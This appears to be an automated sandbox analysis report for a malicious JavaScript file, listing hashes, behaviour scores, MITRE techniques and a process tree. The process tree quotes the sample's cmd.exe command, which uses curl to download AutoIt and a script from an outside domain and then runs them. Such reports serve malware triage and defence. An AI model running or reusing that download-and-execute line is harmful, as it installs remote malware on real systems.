d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
18-10-2023 07:18

Target

Transition_Journey_2023_Confidential.js
Size

50KB
MD5

83914282d9c9680c567121cc18dac066
SHA1

f80092da919ee472ac673c96da20d28c96a30b27
SHA256

412a2790effdc2b85bb83bdf1106fe2f2471df8dfd81df07084ba31371aa8887
SHA512

0f8429f3a2a3c1d972d657c39bd5092395d9b108fbf08ead143daac720a637019222e0a61ed9fba35a9fc2f155c5b060d23ff77cadc31041eb2c5017a24f272b
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3TWpe5q:nAIMFFdYMxAcEQDK

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 2372	1992	wscript.exe	28
PID 1992 wrote to memory of 2372	1992	wscript.exe	28
PID 1992 wrote to memory of 2372	1992	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Transition_Journey_2023_Confidential.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o nebsse.au3 http://hgfdytrywq.com:80/msieghqixob & Autoit3.exe nebsse.au3
  2⤵
  PID:2372

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact